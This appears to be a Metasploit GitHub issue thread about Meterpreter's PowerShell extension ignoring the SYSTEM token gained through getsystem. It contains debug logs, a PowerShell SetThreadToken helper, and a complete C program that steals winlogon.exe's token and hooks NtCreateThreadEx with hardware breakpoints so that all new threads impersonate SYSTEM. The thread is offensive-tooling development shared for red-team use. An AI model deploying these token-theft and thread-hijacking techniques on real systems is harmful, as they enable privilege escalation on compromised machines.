Powershell Extension Execution Does Not Reflect Privilege Changes

[smcintyre-r7]

When running a Windows Meterpreter, the privilege changes applied by getsystem are not reflected in the execution of powershell code through the powershell extension.

I am guessing that this could be due to the thread token not being applied to whatever is running the powershell code. When getsystem is executed and works, there's a core API that's called to set the thread token that should then be used for subsequent meterpreter commands. I'm thinking this is not making it's way to powershell.

metasploit-payloads/c/meterpreter/source/extensions/priv/namedpipe.c

Line 34 in 9047f4e

met_api->thread.update_token(remote, hToken);

[smashery]

I'm not sure this is going to be easy/doable without patching NTDLL or our PowerShell DLL. I can test a bit more; but to summarise the potential issue:

From MSDN doco:

If the calling process is impersonating another user, the new process uses the token for the calling process, not the impersonation token. To run the new process in the security context of the user represented by the impersonation token, use the CreateProcessAsUser or CreateProcessWithLogonW function.

If we set the correct token on the thread running PowerShell (may or may not be doable - may be easy or complicated or version-dependent... TBC), that would only solve it for in-proc Cmdlets.

But as soon as you want PowerShell to launch new processes (like whoami), we're then at the mercy of how PowerShell chooses to launch processes. Presuming it's sensible and just uses CreateProcessW (and doesn't try to impersonate its own thread token), then whoami will just end up running with the meterp process's original token anyway.

I guess it's possible we do the work and find that PowerShell is nice to us hackers and runs with the impersonation token, but I doubt it.

Do any other C2s support this use case?

[smashery]

Incidentally, the same issue exists for in-proc execute_dotnet_assembly; I suspect a different code path, but related root cause, and with the same caveats.

[smashery]

I've looked into this a bit more.

I think the process-launching is probably gonna be tricky, but we could theorise that at least we could modify the token on the PowerShell thread, so that say file operations still work.

For starters, this is clearly not the case even when we avoid new processes; calling [System.Security.Principal.WindowsIdentity]::GetCurrent().Name should look at the token itself; this returns just the username in our PowerShell module.

So what is the underlying thread doing? I added some debugging code to figure that out empirically, using GetCurrentThreadId (note - you can't use CurrentThread.ManagedThreadId, as .NET threads are IDed differently than the underlying unmanaged thread; you need to PInvoke GetCurrentThreadId to get a meaningful comparison).

Here was the result, using a powershell_execute of the WindowsIdentity code above:

meterpreter > powershell_execute [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
[+] Command execution completed:
WIN10BASE\smash

Debug log (relevent entries only):

[7692] [1034] [PSH SHELL] C-Side; Thread: 4148 
[7692] [1034] [POPUID] C-Side: User: WIN10BASE\smash 
[7692] [PSH RUNNER] Running unchannelised
[7692] [PSH RUNNER] C# Side; User is: WIN10BASE\smash
[7692] [PSH RUNNER] C# Side; Thread is: 4148

So both sides agree on which thread they're on (as expected, but at least we've proven it to ourselves). Doing the same after getsystem:

meterpreter > powershell_execute [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
[+] Command execution completed:
WIN10BASE\smash

Bug present; but the debug log:

[7692] [25cc] [PSH SHELL] C-Side; Thread: 9676 
[7692] [25cc] [POPUID] C-Side: User: NT AUTHORITY\SYSTEM
[7692] [PSH RUNNER] Running unchannelised
[7692] [PSH RUNNER] C# Side; User is: NT AUTHORITY\SYSTEM
[7692] [PSH RUNNER] C# Side; Thread is: 9676

So we have a discrepancy. Is there somehow another thread sneaking in? I created a PowerShell PInvoke for GetCurrentThread, and ran that:

meterpreter > powershell_execute Get-UnmanagedThreadId
[+] Command execution completed:
8744

[7692] [2fa8] [PSH SHELL] C-Side; Thread: 12200 
[7692] [2fa8] [POPUID] C-Side: User: NT AUTHORITY\SYSTEM 
[7692] [PSH RUNNER] Running unchannelised
[7692] [PSH RUNNER] C# Side; User is: NT AUTHORITY\SYSTEM
[7692] [PSH RUNNER] C# Side; Thread is: 12200

So clearly something inside Pipeline.Invoke is creating a new thread.

One approach we could take is just set the thread token manually at the start of every command we ever send. Because we're running our own PS and not worried about AMSI, it could actually work. As a quick mockup, I imported the following script:

function Set-CurrentThreadToken {
    param (
        [Parameter(Mandatory = $true)]
        [IntPtr]$TokenHandle
    )

    Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public class Advapi32 {
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool SetThreadToken(IntPtr Thread, IntPtr Token);
}
"@

    [Advapi32]::SetThreadToken([IntPtr]::Zero, $TokenHandle)
    if (-not $success) {
        $errorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
        Write-Host "SetThreadToken failed. Win32 Error Code: $errorCode"
    } else {
        Write-Host "Thread token set successfully."
    }
}

I did getsystem, logged the token handle to the debug log, and then forcibly set it.

PS > Set-CurrentThreadToken ([System.IntPtr]1384); [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
Thread token set successfully.
NT AUTHORITY\SYSTEM

So as one approach, we could pass the currently-stored impersonation token all the way through to the PowerShell module.

That said, when I tried it with a non-system impersonate_token from incognito, it failed:

PS > Set-CurrentThreadToken ([System.IntPtr]400);
False
SetThreadToken failed. Win32 Error Code: 0

This is the same behaviour as when you pass a nonexistent handle through; so it could be because a token handle has been closed and I'm not quite following the impersonation logic correctly yet; or something else.

[smashery]

Another weirdness is that whoami fails when running with the system token:

PS > Set-CurrentThreadToken ([System.IntPtr]1336); whoami                                                                                                                                  Thread token set successfully.
ERROR: whoami : ERROR: Access is denied.
ERROR: At line:1 char:47
ERROR: + Set-CurrentThreadToken ([System.IntPtr]1336); whoami
ERROR: +                                               ~~~~~~                                                                                                                              ERROR:     + CategoryInfo          : NotSpecified: (ERROR: Access is denied.:String) [], RemoteException                                                                                   ERROR:     + FullyQualifiedErrorId : NativeCommandError
ERROR:
ERROR:
ERROR: ERROR: Access is denied.
ERROR:

Other processes are fine though:

PS > Set-CurrentThreadToken ([System.IntPtr]1336); hostname
Thread token set successfully.
Win10Base

I have no idea why this is the case. I can even run a custom binary that then launches whoami and it's fine.

[smashery]

Another wrinkle is that some powershell scripts that are loaded may utilise multiple threads, at which point we're out of control.

[Acebond]

What you can do is set a hardware breakpoint on NtCreateThreadEx, and whenever that hits, hijack the start routine to run our function first, which calls ImpersonateLoggedOnUser, and also setups the breakpoints for that thread too (as the hardware breakpoints are per thread) so the hijack cascades to all threads of threads of threads.... We then also call the real start routine which is passed over.

Compile with Visual Studio and set C language to C17. Run as Admin bc it gets the SYSTEM token as an example.

#include <Windows.h>
#include <TlHelp32.h>
#include <tchar.h>

#include <stdio.h>
#include <stdlib.h>

typedef VOID(NTAPI* NtCreateThreadEx)();

typedef NTSTATUS (NTAPI* USER_THREAD_START_ROUTINE)(
    _In_ PVOID ThreadParameter
);

typedef struct _ThreadOriginalData {
    USER_THREAD_START_ROUTINE StartRoutine;
    PVOID Argument;
} ThreadOriginalData;

DWORD WINAPI HijackedThreadStartRoutine(LPVOID lpParam);

NtCreateThreadEx fnNtCreateThreadEx = NULL;
HANDLE g_hImpersonationToken = NULL;

// *****
// This code just gets a SYSTEM token as an example
// *****
BOOL EnablePrivilege(LPCWSTR privilege) {

    HANDLE token        = NULL;
    TOKEN_PRIVILEGES tp = { 0 };

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &token)) {
        printf("OpenProcessToken failed with error: %lu\n", GetLastError());
        return FALSE;
    }

    if (!LookupPrivilegeValueW(NULL, privilege, &tp.Privileges[0].Luid)) {
        printf("LookupPrivilegeValueW failed with error: %lu\n", GetLastError());
        CloseHandle(token);
        return FALSE;
    }

    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    if (!AdjustTokenPrivileges(token, FALSE, &tp, 0, NULL, NULL)) {
        printf("AdjustTokenPrivileges failed with error: %lu\n", GetLastError());
        CloseHandle(token);
        return FALSE;
    }

    CloseHandle(token);
    return TRUE;
}

DWORD FindSystemProcessId() {

    PROCESSENTRY32 pe = { .dwSize = sizeof(pe) };
    
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snapshot == INVALID_HANDLE_VALUE) return 0;

    DWORD pid = 0;
    if (Process32First(snapshot, &pe)) {
        do {
            if (_tcsicmp(pe.szExeFile, TEXT("winlogon.exe")) == 0) {
                pid = pe.th32ProcessID;
                break;
            }
        } while (Process32Next(snapshot, &pe));
    }

    CloseHandle(snapshot);
    return pid;
}

HANDLE GetSystemToken(void) {

    if (!EnablePrivilege(SE_DEBUG_NAME)) {
        printf("Failed to enabled SE_DEBUG_NAME\n");
        return NULL;
    }

    if (!EnablePrivilege(SE_IMPERSONATE_NAME)) {
        printf("Failed to enabled SE_IMPERSONATE_NAME\n");
        return NULL;
    }

    DWORD pid = FindSystemProcessId();
    if (!pid) {
        printf("Could not find winlogon.exe\n");
        return NULL;
    }

    HANDLE hProcess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pid);
    if (!hProcess) {
        printf("OpenProcess failed: %lu\n", GetLastError());
        return NULL;
    }

    HANDLE hToken = NULL;
    if (!OpenProcessToken(hProcess, TOKEN_DUPLICATE | TOKEN_QUERY, &hToken)) {
        printf("OpenProcessToken failed: %lu\n", GetLastError());
        CloseHandle(hProcess);
        return NULL;
    }

    HANDLE hDupToken = NULL;
    if (!DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenImpersonation, &hDupToken)) {
        printf("DuplicateTokenEx failed: %lu\n", GetLastError());
        CloseHandle(hToken);
        CloseHandle(hProcess);
        return NULL;
    }

    CloseHandle(hToken);
    CloseHandle(hProcess);
    return hDupToken;

}

LONG WINAPI ExceptionHandler(PEXCEPTION_POINTERS ExceptionInfo) {

    // Check if this is a single-step exception caused by a hardware breakpoint
    if (ExceptionInfo->ExceptionRecord->ExceptionCode == EXCEPTION_SINGLE_STEP) {
        // Check if the breakpoint was hit for NtCreateThreadEx
        if (ExceptionInfo->ContextRecord->Dr0 == (DWORD_PTR)fnNtCreateThreadEx) {
            printf("NtCreateThreadEx Hooked via hardware breakpoint!\n");

            ThreadOriginalData* data = malloc(sizeof(ThreadOriginalData));
            if (data != NULL) {
                PVOID StartRoutine = *(PVOID*)(ExceptionInfo->ContextRecord->Rsp + 0x28);
                PVOID Argument     = *(PVOID*)(ExceptionInfo->ContextRecord->Rsp + 0x30);

                data->StartRoutine = StartRoutine;
                data->Argument     = Argument;

                PVOID* pStartRoutine = (PVOID*)(ExceptionInfo->ContextRecord->Rsp + 0x28);
                *pStartRoutine = HijackedThreadStartRoutine;

                PVOID* pArgument = (PVOID*)(ExceptionInfo->ContextRecord->Rsp + 0x30);
                *pArgument = data;
            }

             // Set the resume flag before continuing execution
            ExceptionInfo->ContextRecord->EFlags |= 0x10000;
            return EXCEPTION_CONTINUE_EXECUTION;
        }
    }


    return EXCEPTION_CONTINUE_SEARCH;
}

void EnableBreakpoint(HANDLE hThread, PVOID address) {

    CONTEXT context = { .ContextFlags = CONTEXT_DEBUG_REGISTERS };

    if (!GetThreadContext(hThread, &context)) {
        return;
    }

    context.Dr0 = (DWORD_PTR)address;
    context.Dr7 |= 1;  // Enable the breakpoint for execution on DR0

    // Set the thread context with the updated debug registers
    if (!SetThreadContext(hThread, &context)) {
        return;
    }

}

DWORD WINAPI MyThreadFunction(LPVOID lpParam) {

    char username[255];
    DWORD username_len = sizeof(username);

    if (GetUserNameA(username, &username_len)) {
        printf("Current user: %s\n", username);
    }
    else {
        printf("Failed to get username. Error: %lu\n", GetLastError());
    }

    while (1) {
        printf("Hello 0x%llx\n", (DWORD64)lpParam);
        Sleep(10000);
        // Example of a thread creating more threads
        CreateThread(NULL, 0, MyThreadFunction, (LPVOID)(0x6969 + 0x1), 0, NULL);
    }
    return 0;
}

DWORD WINAPI HijackedThreadStartRoutine(LPVOID lpParam) {

    ThreadOriginalData* data = (ThreadOriginalData*)lpParam;

    if (!ImpersonateLoggedOnUser(g_hImpersonationToken)) {
        printf("ImpersonateLoggedOnUser failed: %lu\n", GetLastError());
    }
    EnableBreakpoint(GetCurrentThread(), fnNtCreateThreadEx);

    return data->StartRoutine(data->Argument);

}

int main(void) {

    HMODULE ntdll = GetModuleHandle(TEXT("ntdll.dll"));
    if (ntdll == NULL) {
        printf("GetModuleHandle failed with error: %lu\n", GetLastError());
        return 1;
    }

    fnNtCreateThreadEx = (NtCreateThreadEx)GetProcAddress(ntdll, "NtCreateThreadEx");
    if (fnNtCreateThreadEx == NULL) {
        printf("GetProcAddress failed with error: %lu\n", GetLastError());
        return 1;
    }

    g_hImpersonationToken = GetSystemToken();

    HANDLE hExHandler = AddVectoredExceptionHandler(1, ExceptionHandler);

    EnableBreakpoint(GetCurrentThread(), fnNtCreateThreadEx);

    if (!ImpersonateLoggedOnUser(g_hImpersonationToken)) {
        printf("ImpersonateLoggedOnUser failed: %lu\n", GetLastError());
        return 1;
    }

    printf("Successfully impersonated SYSTEM!\n");

    // We assume no control of the code from here on out, the following code can do anything, but any threads created, or threads those threads create will impersonate the g_hImpersonationToken.

    HANDLE hThread = CreateThread(NULL, 0, MyThreadFunction, (LPVOID)0x6969, 0, NULL );
    if (hThread == NULL) {
        printf("CreateThread failed: %lu\n", GetLastError());
        return 1;
    }
    WaitForSingleObject(hThread, INFINITE);

	return 0;
}